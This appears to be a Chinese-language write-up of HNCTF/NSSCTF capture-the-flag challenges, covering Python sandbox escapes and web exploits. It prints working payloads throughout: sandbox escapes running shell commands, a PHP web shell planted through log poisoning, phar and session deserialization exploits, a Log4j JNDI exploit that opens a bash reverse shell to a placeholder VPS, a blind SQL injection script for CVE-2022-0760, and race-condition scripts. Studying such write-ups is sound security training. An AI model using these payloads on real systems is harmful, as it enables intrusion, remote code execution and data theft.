             |___/                          |__/                                                                        
'''
    print(WELCOME)
    print("It's so easy challenge!")
    print("Seems flag into the dir()")
    repl()
def repl():
    my_global_dict = dict()
    my_global_dict['my_flag'] = flag
    input_code = input("> ")
    complie_code = compile(input_code, '<string>', 'single')
    exec(complie_code, my_global_dict)
if __name__ == '__main__':
    main()

load_flag.py

class secert_flag(str):
    def __repr__(self) -> str:
        return "DELETED"
    def __str__(self) -> str:
        return "DELETED"
class flag_level5:
    def __init__(self, flag: str):
        setattr(self, 'flag_level5', secert_flag(flag))
def get_flag():
    with open('flag') as f:
        return flag_level5(f.read())

payload
预期解：

‘’.join(my_flag.flag_level5)
NSSCTF{3b707fa6-65d4-4cd3-8b5b-5bfa6b63bc2a}

非预期解(1)：

1
2
3

breakpoint()
__import__('os').system('cat *')
flag=NSSCTF{3b707fa6-65d4-4cd3-8b5b-5bfa6b63bc2a}

非预期解(2):

my_flag.flag_level5.index(‘NSSCTF{*****’) 爆破

NSSCTF jail level 6

题解

server.py

import sys

def my_audit_hook(my_event, _):
    WHITED_EVENTS = set({'builtins.input', 'builtins.input/result', 'exec', 'compile'})
    if my_event not in WHITED_EVENTS:
        raise RuntimeError('Operation not permitted: {}'.format(my_event))

def my_input():
    dict_global = dict()
    while True:
      try:
          input_data = input("> ")
      except EOFError:
          print()
          break
      except KeyboardInterrupt:
          print('bye~~')
          continue
      if input_data == '':
          continue
      try:
          complie_code = compile(input_data, '<string>', 'single')
      except SyntaxError as err:
          print(err)
          continue
      try:
          exec(complie_code, dict_global)
      except Exception as err:
          print(err)


def main():
  WELCOME = '''
  _                _                           _       _ _   _                _   __
 | |              (_)                         (_)     (_) | | |              | | / /
 | |__   ___  __ _ _ _ __  _ __   ___ _ __     _  __ _ _| | | | _____   _____| |/ /_
 | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__|   | |/ _` | | | | |/ _ \ \ / / _ \ | '_ \
 | |_) |  __/ (_| | | | | | | | |  __/ |      | | (_| | | | | |  __/\ V /  __/ | (_) |
 |_.__/ \___|\__, |_|_| |_|_| |_|\___|_|      | |\__,_|_|_| |_|\___| \_/ \___|_|\___/
              __/ |                          _/ |
             |___/                          |__/                                                                        
  '''

  CODE = '''
  dict_global = dict()
    while True:
      try:
          input_data = input("> ")
      except EOFError:
          print()
          break
      except KeyboardInterrupt:
          print('bye~~')
          continue
      if input_data == '':
          continue
      try:
          complie_code = compile(input_data, '<string>', 'single')
      except SyntaxError as err:
          print(err)
          continue
      try:
          exec(complie_code, dict_global)
      except Exception as err:
          print(err)
  '''

  print(WELCOME)

  print("Welcome to the python jail")
  print("Let's have an beginner jail of calc")
  print("Enter your expression and I will evaluate it for you.")
  print("White list of audit hook ===> builtins.input,builtins.input/result,exec,compile")
  print("Some code of python jail:")
  print(CODE)
  my_input()

if __name__ == "__main__":
  sys.addaudithook(my_audit_hook)
  main()

非预期

__builtins__["__loader__"].load_module("_posixsubprocess").fork_exec([b"/usr/bin/cat", "flag"], [b"/usr/bin/cat"], True, (), None, None, -1, -1, -1, -1, -1, -1, *(__builtins__["__loader__"].load_module('os').pipe()), False, False, None, None, None, -1, None)

预期

1	exec("globals()['__builtins__']['set']=lambda x: ['builtins.input', 'builtins.input/result','exec', 'compile', 'os.system']\nimport os\nos.system('cat flag')")

NSSCTF jail level 7

题解

server.py

import ast
import sys
import os

WELCOME = '''

    _       _ _   _                _                         _                _ ______
   (_)     (_) | | |              (_)                       | |              | |____  |
    _  __ _ _| | | |__   ___  __ _ _ _ __  _ __   ___ _ __  | | _____   _____| |   / /
   | |/ _` | | | | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _ \ \ / / _ \ |  / /
   | | (_| | | | | |_) |  __/ (_| | | | | | | | |  __/ |    | |  __/\ V /  __/ | / /
   | |\__,_|_|_| |_.__/ \___|\__, |_|_| |_|_| |_|\___|_|    |_|\___| \_/ \___|_|/_/
  _/ |                        __/ |
 |__/                        |___/

'''

def verify_ast_secure(m):
  for x in ast.walk(m):
    match type(x):
      case (ast.Import|ast.ImportFrom|ast.Call|ast.Expr|ast.Add|ast.Lambda|ast.FunctionDef|ast.AsyncFunctionDef|ast.Sub|ast.Mult|ast.Div|ast.Del):
        print(f"ERROR: Banned statement {x}")
        return False
  return True


def exexute_code(my_source_code):
  print("Pls input your code: (last line must contain only --HNCTF)")
  while True:
    line = sys.stdin.readline()
    if line.startswith("--HNCTF"):
      break
    my_source_code += line

  tree_check = compile(my_source_code, "input_code.py", 'exec', flags=ast.PyCF_ONLY_AST)
  if verify_ast_secure(tree_check):
    print("check is passed!now the result is:")
    compiled_code = compile(my_source_code, "input_code.py", 'exec')
    exec(compiled_code)
  print("Press any key to continue")
  sys.stdin.readline()


while True:
  os.system("clear")
  print(WELCOME)
  print("=================================================================================================")
  print("==           Welcome to the calc jail beginner level7,It's AST challenge                       ==")
  print("==           Menu list:                                                                        ==")
  print("==             [G]et the blacklist AST                                                         ==")
  print("==             [E]xecute the python code                                                       ==")
  print("==             [Q]uit jail challenge                                                           ==")
  print("=================================================================================================")
  ans = (sys.stdin.readline().strip()).lower()
  if ans == 'g':
     print("=================================================================================================")
     print("==        Black List AST:                                                                      ==")
     print("==                       'Import,ImportFrom,Call,Expr,Add,Lambda,FunctionDef,AsyncFunctionDef  ==")
     print("==                        Sub,Mult,Div,Del'                                                    ==")
     print("=================================================================================================")
     print("Press any key to continue")
     sys.stdin.readline()
  elif ans == 'e':
    my_source_code = ""
    exexute_code(my_source_code)
  elif ans == 'q':
    print("Bye")
    quit()
  else:
    print("Unknown options!")
    quit()

payload

@exec
@input
class A:
    pass
--HNCTF

__import__('os').system('car flag')

NSSCTF s@Fe safeeval

题解

server.py

import os
import sys
import traceback
import pwnlib.util.safeeval as safeeval

# https://github.com/Gallopsled/pwntools/blob/ef698d4562024802be5cc3e2fa49333c70a96662/pwnlib/util/safeeval.py#L3
_const_codes = [
    'POP_TOP','ROT_TWO','ROT_THREE','ROT_FOUR','DUP_TOP',
    'BUILD_LIST','BUILD_MAP','BUILD_TUPLE','BUILD_SET',
    'BUILD_CONST_KEY_MAP', 'BUILD_STRING',
    'LOAD_CONST','RETURN_VALUE','STORE_SUBSCR', 'STORE_MAP',
    'LIST_TO_TUPLE', 'LIST_EXTEND', 'SET_UPDATE', 'DICT_UPDATE', 'DICT_MERGE',
    ]

_expr_codes = _const_codes + [
    'UNARY_POSITIVE','UNARY_NEGATIVE','UNARY_NOT',
    'UNARY_INVERT','BINARY_POWER','BINARY_MULTIPLY',
    'BINARY_DIVIDE','BINARY_FLOOR_DIVIDE','BINARY_TRUE_DIVIDE',
    'BINARY_MODULO','BINARY_ADD','BINARY_SUBTRACT',
    'BINARY_LSHIFT','BINARY_RSHIFT','BINARY_AND','BINARY_XOR',
    'BINARY_OR',
    ]

blocklist_codes = _expr_codes + ['MAKE_FUNCTION', 'CALL_FUNCTION']

TURING_PROTECT_SAFE = True

banned = '''
    [
        'POP_TOP','ROT_TWO','ROT_THREE','ROT_FOUR','DUP_TOP',
        'BUILD_LIST','BUILD_MAP','BUILD_TUPLE','BUILD_SET',
        'BUILD_CONST_KEY_MAP', 'BUILD_STRING','LOAD_CONST','RETURN_VALUE',
        'STORE_SUBSCR', 'STORE_MAP','LIST_TO_TUPLE', 'LIST_EXTEND', 'SET_UPDATE',
        'DICT_UPDATE', 'DICT_MERGE','UNARY_POSITIVE','UNARY_NEGATIVE','UNARY_NOT',
        'UNARY_INVERT','BINARY_POWER','BINARY_MULTIPLY','BINARY_DIVIDE','BINARY_FLOOR_DIVIDE',
        'BINARY_TRUE_DIVIDE','BINARY_MODULO','BINARY_ADD','BINARY_SUBTRACT','BINARY_LSHIFT',
        'BINARY_RSHIFT','BINARY_AND','BINARY_XOR','BINARY_OR','MAKE_FUNCTION', 'CALL_FUNCTION'
    ]
'''

code = '''
    import os
    import sys
    import traceback
    import pwnlib.util.safeeval as safeeval
    input_data = input('> ')
    print(expr(input_data))
    def expr(n):
        if TURING_PROTECT_SAFE:
            m = safeeval.test_expr(n, blocklist_codes)
            return eval(m)
        else:
            return safeeval.expr(n)
'''

WELCOME = '''
              ______                __                     _
        ____ |  ____|              / _|                   | |
  ___  / __ \| |__ ___   ___  __ _| |_ ___  _____   ____ _| |
 / __|/ / _` |  __/ _ \ / __|/ _` |  _/ _ \/ _ \ \ / / _` | |
 \__ \ | (_| | | |  __/ \__ \ (_| | ||  __/  __/\ V / (_| | |
 |___/\ \__,_|_|  \___| |___/\__,_|_| \___|\___| \_/ \__,_|_|
       \____/                                                                                                           
'''


def expr(n):
    if TURING_PROTECT_SAFE:
        m = safeeval.test_expr(n, blocklist_codes)
        return eval(m)
    else:
        return safeeval.expr(n)

try:
    print(WELCOME)
    print('Turing s@Fe mode:', 'on' if TURING_PROTECT_SAFE else 'off')
    print('Black List:')
    print(banned)
    print('some code:')
    print(code)
    while True:
        input_data = input('> ')
        try:
            print(expr(input_data))
        except Exception as err:
            traceback.print_exc(file=sys.stdout)
except EOFError as input_data:
    print()

payload

(lambda: os.system(‘/bin/sh’))()
cat flag

NSSCTF python2 jail

题解

server.py

WELCOME = '''
              _   _      ___        ___    _____             _    _ _   
             | | | |    / _ \      |__ \  |_   _|           | |  | | |  
  _ __  _   _| |_| |__ | | | |_ __    ) |   | |  _ __  _ __ | |  | | |_ 
 | '_ \| | | | __| '_ \| | | | '_ \  / /    | | | '_ \| '_ \| |  | | __|
 | |_) | |_| | |_| | | | |_| | | | |/ /_   _| |_| | | | |_) | |__| | |_ 
 | .__/ \__, |\__|_| |_|\___/|_| |_|____| |_____|_| |_| .__/ \____/ \__|
 | |     __/ |                                        | |               
 |_|    |___/                                         |_|                               
'''

print WELCOME

print "Welcome to the python jail"
print "But this program will repeat your messages"
input_data = input("> ")
print input_data

payload

1	__import__("os").system('cat flag')

NSSCTF{4fd091c9-cd80-4088-9967-9c088e940837}

NSSCTF jail lake lake lake

题解

server.py

#it seems have a backdoor
#can u find the key of it and use the backdoor

fake_key_var_in_the_local_but_real_in_the_remote = "[DELETED]"

def func():
    code = input(">")
    if(len(code)>9):
        return print("you're hacker!")
    try:
        print(eval(code))
    except:
        pass

def backdoor():
    print("Please enter the admin key")
    key = input(">")
    if(key == fake_key_var_in_the_local_but_real_in_the_remote):
        code = input(">")
        try:
            print(eval(code))
        except:
            pass
    else:
        print("Nooo!!!!")

WELCOME = '''
  _       _          _       _          _       _        
 | |     | |        | |     | |        | |     | |       
 | | __ _| | _____  | | __ _| | _____  | | __ _| | _____ 
 | |/ _` | |/ / _ \ | |/ _` | |/ / _ \ | |/ _` | |/ / _ \
 | | (_| |   <  __/ | | (_| |   <  __/ | | (_| |   <  __/
 |_|\__,_|_|\_\___| |_|\__,_|_|\_\___| |_|\__,_|_|\_\___|                    
'''

print(WELCOME)

print("Now the program has two functions")
print("can you use dockerdoor")
print("1.func")
print("2.backdoor")
input_data = input("> ")
if(input_data == "1"):
    func()
    exit(0)
elif(input_data == "2"):
    backdoor()
    exit(0)
else:
    print("not found the choice")
    exit(0)

payload

1

globals()

{'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x7f090e9a0ac0>, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, '__file__': '/home/ctf/./server.py', '__cached__': None, 'key_9b1d015375213e21': 'a34af94e88aed5c34fb5ccfe08cd14ab', 'func': <function func at 0x7f090eb3fd90>, 'backdoor': <function backdoor at 0x7f090ea01fc0>, 'WELCOME': '\n'}

2

a34af94e88aed5c34fb5ccfe08cd14ab

__import__("os").system('cat flag')

flag

NSSCTF{4ea288b4-cce3-45dd-8749-120bb5e359eb}

NSSCTF jail l@ke l@ke l@ke

题解

server.py

#it seems have a backdoor as `lake lake lake`
#but it seems be limited!
#can u find the key of it and use the backdoor
fake_key_var_in_the_local_but_real_in_the_remote = "[DELETED]"
def func():
    code = input(">")
    if(len(code)>6):
        return print("you're hacker!")
    try:
        print(eval(code))
    except:
        pass
def backdoor():
    print("Please enter the admin key")
    key = input(">")
    if(key == fake_key_var_in_the_local_but_real_in_the_remote):
        code = input(">")
        try:
            print(eval(code))
        except:
            pass
    else:
        print("Nooo!!!!")
WELCOME = '''
  _         _          _         _          _         _        
 | |  ____ | |        | |  ____ | |        | |  ____ | |       
 | | / __ \| | _____  | | / __ \| | _____  | | / __ \| | _____ 
 | |/ / _` | |/ / _ \ | |/ / _` | |/ / _ \ | |/ / _` | |/ / _ \
 | | | (_| |   <  __/ | | | (_| |   <  __/ | | | (_| |   <  __/
 |_|\ \__,_|_|\_\___| |_|\ \__,_|_|\_\___| |_|\ \__,_|_|\_\___|
     \____/               \____/               \____/                                                                                                                                                                                                                                        
'''
print(WELCOME)
print("Now the program has two functions")
print("can you use dockerdoor")
print("1.func")
print("2.backdoor")
input_data = input("> ")
if(input_data == "1"):
    func()
    exit(0)
elif(input_data == "2"):
    backdoor()
    exit(0)
else:
    print("not found the choice")
    exit(0)

payload

1 > help() > server > 1 > help() > server
第一次 help() 中查看 server 时，环境变为 server.py，此时可以查看变量
ke_9d38ee7f31d6126d = ‘95c720690c2c83f0982ffba63ff87338’
NSSCTF{422d9d33-4c34-49ec-889c-a7fd7dd3f15a}

NSSCTF laKe laKe laKe

题解

server.py

#You finsih these two challenge of leak
#So cool
#Now it's time for laKe!!!!

import random
from io import StringIO
import sys
sys.addaudithook

BLACKED_LIST = ['compile', 'eval', 'exec', 'open']

eval_func = eval
open_func = open

for m in BLACKED_LIST:
    del __builtins__.__dict__[m]


def my_audit_hook(event, _):
    BALCKED_EVENTS = set({'pty.spawn', 'os.system', 'os.exec', 'os.posix_spawn','os.spawn','subprocess.Popen'})
    if event in BALCKED_EVENTS:
        raise RuntimeError('Operation banned: {}'.format(event))

def guesser():
    game_score = 0
    sys.stdout.write('Can u guess the number? between 1 and 9999999999999 > ')
    sys.stdout.flush()
    right_guesser_question_answer = random.randint(1, 9999999999999)
    sys.stdout, sys.stderr, challenge_original_stdout = StringIO(), StringIO(), sys.stdout

    try:
        input_data = eval_func(input(''),{},{})
    except Exception:
        sys.stdout = challenge_original_stdout
        print("Seems not right! please guess it!")
        return game_score
    sys.stdout = challenge_original_stdout

    if input_data == right_guesser_question_answer:
        game_score += 1
    
    return game_score

WELCOME='''
  _       _  __      _       _  __      _       _  __    
 | |     | |/ /     | |     | |/ /     | |     | |/ /    
 | | __ _| ' / ___  | | __ _| ' / ___  | | __ _| ' / ___ 
 | |/ _` |  < / _ \ | |/ _` |  < / _ \ | |/ _` |  < / _ \
 | | (_| | . \  __/ | | (_| | . \  __/ | | (_| | . \  __/
 |_|\__,_|_|\_\___| |_|\__,_|_|\_\___| |_|\__,_|_|\_\___|
                                                         
'''

def main():
    print(WELCOME)
    print('Welcome to my guesser game!')
    game_score = guesser()
    if game_score == 1:
        print('you are really super guesser!!!!')
        print(open_func('flag').read())
    else:
        print('Guess game end!!!')

if __name__ == '__main__':
    sys.addaudithook(my_audit_hook)
    main()

payload

1	list(__import__('sys')._getframe(1).f_locals.values())[1]

flag

NSSCTF{cfb193c0-6ae9-4213-b75d-d6304cf5b5ea}

NSSCTF Side-channel/pyjail: tyPe Ch@nnEl

题解

server.py

MY_FLAG = "NSSCTF{fake_flag_in_local_but_really_in_The_remote}"
BLACED_KLIST = '"%&\',-/_:;@\\`{|}~*<=>[] \t\n\r'
def my_safe_check(n):
    return all(ord(m) < 0x7f for m in n) and all(m not in n for m in BLACED_KLIST)
def my_safe_eval(m, my_func):
    if not my_safe_check(m):
        print("Hacker!!!!")
    else:
        try:
            print(eval(f"{my_func.__name__}({m})", {"__builtins__": {my_func.__name__: my_func}, "flag": MY_FLAG}))
        except:
            print("Try again!")
if __name__ == "__main__":
    my_safe_eval(input("Payload:"), type)

题目分析

eval 的执行环境很干净，啥都没有，能用的只有数据类型的初始属性，并且所有魔法方法都不能用，意味着全程只能用 flag 中存在的东西操作 flag

1
2

dir('')
['__add__', '__class__', '__contains__', '__delattr__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__getitem__', '__getnewargs__', '__gt__', '__hash__', '__init__', '__init_subclass__', '__iter__', '__le__', '__len__', '__lt__', '__mod__', '__mul__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__rmod__', '__rmul__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'capitalize', 'casefold', 'center', 'count', 'encode', 'endswith', 'expandtabs', 'find', 'format', 'format_map', 'index', 'isalnum', 'isalpha', 'isascii', 'isdecimal', 'isdigit', 'isidentifier', 'islower', 'isnumeric', 'isprintable', 'isspace', 'istitle', 'isupper', 'join', 'ljust', 'lower', 'lstrip', 'maketrans', 'partition', 'removeprefix', 'removesuffix', 'replace', 'rfind', 'rindex', 'rjust', 'rpartition', 'rsplit', 'rstrip', 'split', 'splitlines', 'startswith', 'strip', 'swapcase', 'title', 'translate', 'upper', 'zfill']

新知识++

True == 1 False == 0 可用此来判断 'isalnum', 'isalpha', 'isascii', 'isdecimal', 'isdigit', 'isidentifier', 'islower', 'isnumeric', 'isprintable', 'isspace', 'istitle', 'isupper'

flag.join(flag).split(flag).pop().split().pop(flag.join(flag).split(flag).pop({num}).isdigit())

type([])(‘test’) == list(‘test’) --> [‘t’, ‘e’, ‘s’, ‘t’]

bytes 的切片数据类型为 int
a = b’test’
type(a) --> “bytes”
type(a[0]) --> “int”
a[0] ^ 1 --> 117

来自学长部分 payload

非预期解（运气好，静态flag，费时）

通过 flag.join(flag).split(flag) 可以得到单个字符构成的 list
通过 list.pop() 弹出元素，然后切割 flag，确定弹出元素所在的位置
可以通过分割后 list 元素的数量判断重复次数，通过单个元素的长度判断单个字符的位置
到最后就只能硬猜了，运气好，就猜了 4 次

预期解

type(type(flag).mro())(type(type(flag).mro())(flag).pop({i}).encode()).remove({guess})
i => flag 单字符位置
guess => num 猜测字符的 ascii 码
当相等时 return NoneType，当不相等时报错，然后开始爆破

优化预期解

type(flag.split())(type(flag.split())(flag).pop({}).encode()).remove({})

flag

略

WEB

Challenge RCE

题解

index.php

<?php
error_reporting(0);
if (isset($_GET['hint'])) {
    highlight_file(__FILE__);
}
if (isset($_POST['rce'])) {
    $rce = $_POST['rce'];
    if (strlen($rce) <= 120) {
        if (is_string($rce)) {
            if (!preg_match("/[!@#%^&*:'\-<?>\"\/|`a-zA-Z~\\\\]/", $rce)) {
                eval($rce);
            } else {
                echo("Are you hack me?");
            }
        } else {
            echo "I want string!";
        }
    } else {
        echo "too long!";
    }
}

正则匹配过滤了几乎所有的字符，利用自增得到 $_GET[1]

直接构造应该是不行的，到最后成功压缩到 121 个字符，过不了，不放了

<?php
$_=([]._)[3];   // a
$_++;
$_++;
$_.=$_;    // cc
$_++;
$_++;
$_++;
$_++;
$_++;        // ch
$_.=([]._)[1];   // chr
$_=_.$_(71).$_(69).$_(84);  // _GET
($$_[0])($$_[1]);   // ($_GET[1])($_GET[2])

来自学长的 payload

easy_unser

题解

index.php

<?php 
    include 'f14g.php';
    error_reporting(0);

    highlight_file(__FILE__);

    class body{

    private $want,$todonothing = "i can't get you want,But you can tell me before I wake up and change my mind";

    public function  __construct($want){
        $About_me = "When the object is created,I will be called";
        if($want !== " ") $this->want = $want;
        else $this->want = $this->todonothing;
    }
    function __wakeup(){
        $About_me = "When the object is unserialized,I will be called";
        $but = "I can CHANGE you";
        $this-> want = $but;
        echo "C1ybaby!";
        
    }
    function __destruct(){
        $About_me = "I'm the final function,when the object is destroyed,I will be called";
        echo "So,let me see if you can get what you want\n";
        if($this->todonothing === $this->want)
            die("鲍勃,别傻愣着!\n");
        if($this->want == "I can CHANGE you")
            die("You are not you....");
        if($this->want == "f14g.php" OR is_file($this->want)){
            die("You want my heart?No way!\n");
        }else{
            echo "You got it!";
            highlight_file($this->want);
            }
    }
}

    class unserializeorder{
        public $CORE = "人类最大的敌人,就是无序. Yahi param vaastavikta hai!<BR>";
        function __sleep(){
            $About_me = "When the object is serialized,I will be called";
            echo "We Come To HNCTF,Enjoy the ser14l1zti0n <BR>";
        }
        function __toString(){
            $About_me = "When the object is used as a string,I will be called";
            return $this->CORE;
        }
    }
    
    $obj = new unserializeorder();
    echo $obj;
    $obj = serialize($obj);
    

    if (isset($_GET['ywant']))
    {
        $ywant = @unserialize(@$_GET['ywant']);
        echo $ywant;
    }
?>

payload

<?php
$a = new body('./a/../f14g.php', 'test');   //  利用伪造路径绕过 is_file and == f14g.php
echo urlencode(serialize($a));
// 对象数量加一，绕过 body::__wakeup()
// url 编码，因为其中变量包含 private

easy_include

题解

index.php

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    if(preg_match("/php|flag|data|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=/i", $file)){
        die("error");
    }
    include($file);
}else{
    highlight_file(__FILE__);
}

过滤了伪协议，异或，取反，拼接，flag，但是好像没有过滤 file://
可以访问日志文件

/var/log/nginx/access.log

通过 user-agent 上传木马

1	<?php eval($_POST["cmd"]); ?>

hackbar 改包，上传，上传成功后并不能看到木马内容，不显示，但已经成功了
蚁剑连接，出 flag

NSSCTF{a1cba83f-3eee-4e32-b585-72dc6ec14b16}

CanYouRCE

题解

index.php

<?php
highlight_file(__FILE__);
if(isset($_GET['code'])&&!preg_match('/url|show|high|na|info|dec|oct|pi|log|data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['code'])){
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {    
    eval($_GET['code']);}
else
    die('nonono');}
else
    echo('please input code');
?>  please input code

从正则表达式得到是考 无参数RCE （网上搜的
无参数RCE

只能执行类似 a(b(c()))
但是不能执行 a(‘test’)

不总结所有了，之后专门写一个，只写这用到的（先写作业

readfile(array_rand(array_flip(scandir(pos(localeconv())))))
因为是随机元素，总会有一个是 flag.php

审查，得 flag

NSSCTF{193fff60-095b-4ed4-ac77-984df2b1b842}

ez_phar

题解

index.php

<?php
show_source(__FILE__);
class Flag{
    public $code;
    public function __destruct(){
    // TODO: Implement __destruct() method.
        eval($this->code);
    }
}
$filename = $_GET['filename'];
file_exists($filename);
?>
upload something upload something

payload

<?php 
    class Flag{
        public $code='echo success;eval($_POST["cmd"]);';
        public function __construct($code){
            $this->code=$code;
        }
    }
    $a = new Flag();
    $phar = new Phar("test.phar"); 
    $phar->startBuffering();
    $phar->setStub("<?php __HALT_COMPILER(); ?>");
    $phar->setMetadata($a);
    $phar->addFromString("test.txt", "123"); 
    $phar->stopBuffering();
?>

修改后缀为 png 上传，蚁剑连接 upload/test/test.txt

?filename=phar://upload/test.png/test.txt

flag

NSSCTF{0df9cc80-ca68-4b9d-b331-7406fc05cd06}

logjjjjlogjjjj

题解

下载exp

1	https://codeload.github.com/bkfish/Apache-Log4j-Learning/zip/refs/heads/main

在服务器上启动服务

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -i >& /dev /tcp/{Your VPS IP}/{Listen Port} 0>&l" -A {Your VPS IP} 

>>> 

[ADDRESS] >> 0.0.0.0
[COMMAND] >> bash -i >& /dev /tcp/{Your VPS IP}/{Listen Port} 0>&l
----------------------------JNDI Links---------------------------- 
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://0.0.0.0:1099/24fdbb
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://0.0.0.0:1099/asvdvd
ldap://0.0.0.0:1389/asvdvd
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://0.0.0.0:1099/sacadv
ldap://0.0.0.0:1389/sacadv

开启 VPS 监听

1	ncat -lvvp {Port}

payload

1
2
3

hello?payload=${jndi:ldap://0.0.0.0:1389/sacadv}
/
hello?payload=${jndi:ldap://0.0.0.0:1389/asvdvd}

连接成功后找 Flag

1
2
3

cat sos4cret

NSSCTF{a7a3cb40-db51-40ce-936f-325ab93d2174}

SSTI

题解

过滤

_ os args

通过传参绕过

request.form.{}

payload

1	{{()[request.form.c][request.form.b][request.form.s]()[-15][request.form.i][request.form.g][request.form.o][request.form.sys](request.form.com).read()}}

ssti
4. flag

NSSCTF{078be9fe-c174-4943-a10b-84d9e9f46625}

ohmywordpress

题解

CVE-2022-0760 盲注

https://wpscan.com/vulnerability/1c83ed73-ef02-45c0-a9ab-68a3468d2210

import requests
import time

url = 'http://1.14.71.254:28504/wp-admin/admin-ajax.php'

dicts = r'NSSCTF{-abcdef0123456789}'

flag = ''

for i in range(1,99999):
    for s in dicts:
        payload = "(SELECT 3 FROM (SELECT if(ascii(substr((select group_concat(flag) from ctftraining.flag),{},1))={}, sleep(5),0))enz)".format(i,ord(s))
        start_time = time.time()
        print(s)
        res = requests.post(url,data={
            'action': 'qcopd_upvote_action',
            'post_id': payload
            })
        stop_time = time.time()
        if stop_time - start_time >= 5:
            flag += s
            print('FOUND!!!',flag)
            break

QAQ_1inclu4e

题解

session.upload_progress 文件包含 + 条件竞争

https://www.freebuf.com/vuls/202819.html

# coding=utf-8
import io
import requests
import threading

sessid = ' sessid ' # sessid 根据正则修改
data = {"cmd": "system(' BASH ');"}
url = "http://43.143.7.97:28468/"

def write(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        resp = session.post(url,
                            data={'PHP_SESSION_UPLOAD_PROGRESS': "<?php eval($_POST['cmd']);?>"},
                            files={'file': ('QAQ.txt', f)}, cookies={'PHPSESSID': sessid})

def read(session):
    while True:
        resp = session.post(url+'?filter=/tmp/sess_' + sessid,
                            data=data)
        if 'QAQ.txt' in resp.text:
            print(resp.text)
            event.clear()
        else:
            pass

if __name__ == "__main__":
    event = threading.Event()
    with requests.session() as session:
        for i in range(1, 30):
            threading.Thread(target=write, args=(session,)).start()

        for i in range(1, 30):
            threading.Thread(target=read, args=(session,)).start()
    event.set()

Fun_php

题解

php特性狠活

https://www.cnblogs.com/murkuo/p/15388795.html
https://blog.csdn.net/not_code_god/article/details/123910155

payload

@Get
?user=114514a&pass=0&mySaid=QNKCDZO&myHeart=240610708&hn=hn&%E2%80%AE%E2%81%A6LAG%E2%81%A9%E2%81%A6ctf=%E2%80%AE%E2%81%A6%20Flag!%E2%81%A9%E2%81%A6ctf

@POST
data[]=0&verify[]=1&want=f*%26%26tac+f*>a

unf1ni3hed_web3he11

题解

session.upload_progress反序列化条件竞争

https://blog.csdn.net/qq_61237064/article/details/123405767

流量抓取到真的题目位置：Rea1web3he11.php，根据提示 t00llll,访问t00llll.php 得到查看源码的方法，协议读取

1	include_=php://filter/convert.base64-encode/resource=Rea1web3he11.php

php 反序列化

<?php
ini_set('session.serialize_handler', 'php_serialize');
session_start();

class webshell{
    public $caution;

    function __construct(){
        $this -> caution = new execution();
    }

    function __destruct(){
        $this -> caution -> world_execute();
    }
    
}
class caution{
    function world_execute(){
        echo "Webshell初&#%始*$%&^化,$))(&*(%#^**ERROR**#@$()"."<br>";
    }
}
class execution{
    public $cmd;
    function __construct(){
        $this -> cmd = "system('find / -name flag*');";
        # $this -> cmd = "phpinfo();";
    }
    function world_execute(){
        eval($this -> cmd);
    }
}
$a=new webshell();
$b=serialize($a);
$c=addslashes($b);
$d=str_replace("O:8:","|O:8:",$c);
echo $d;
?>
···echo
|O:8:\"webshell\":1:{s:7:\"caution\";O:9:\"execution\":1:{s:3:\"cmd\";s:29:\"system(\'find / -name flag*\');\";}}
···

这个地方注意，我们只需要转义 ’ " ’ 双引号，而如果转义了单引号会导致序列化后的对象命令无法执行，所以最后传参的payload如下：

1	\|O:8:\"webshell\":1:{s:7:\"caution\";O:9:\"execution\":1:{s:3:\"cmd\";s:29:\"system('find / -name flag*');\";}}

条件竞争

#coding=utf-8
import requests
import threading
import io

def exp():
    while True:
        et.wait()
        url = 'http://120.48.91.102:40888/Rea1web3he11.php'
        headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
        'DNT': '1',
        'Cookie': 'PHPSESSID=aaaaaa',
        'Connection': 'close',
        'Upgrade-Insecure-Requests': '1'
        }
        f = io.BytesIO(b'a' * 1024)
        proxy = {
        'http': 'http://127.0.0.1:8080'
        }
        data={'PHP_SESSION_UPLOAD_PROGRESS':'aaaaaa'}
        files={
            'file':(r'|O:8:\"webshell\":1:{s:7:\"caution\";O:9:\"execution\":1:{s:3:\"cmd\";s:10:\"phpinfo();\";}}',f,'text/plain')
        }
        
        resp = requests.post(url,headers=headers,data=data,files=files,proxies=proxy) #,proxies=proxy
        resp.encoding="utf-8"
        print(resp.content.decode('utf-8').encode('utf-8'))
        # if len(resp.text)<2000:
        #     print('[+++++]retry')
        # else:
        #     print(resp.content.decode('utf-8').encode('utf-8'))
        #     et.clear()
        #     print('success!')
            

if __name__ == "__main__":
    et=threading.Event()
    for i in range(1,40):
        threading.Thread(target=exp,).start()
    et.set()

抓包

fun_sql

堆叠注入
payload

1	%27;insert%20into%20ccctttfff%20values(%272%27,%27aa%27,%27asdas%27);SELECT%201,2,3%20%271

HNCTF官方wp

Pwn wp:https://hxz3zo0taq.feishu.cn/docx/doxcn7rfTxf8pk2UhNexjMOLQhb
Reverse wp:https://dqgom7v7dl.feishu.cn/docx/doxcnFESSimJ4UEvZK9ja8ZnArg
Web wp:https://dqgom7v7dl.feishu.cn/docx/doxcnfAleQyWvxtaviJQUyfedGd
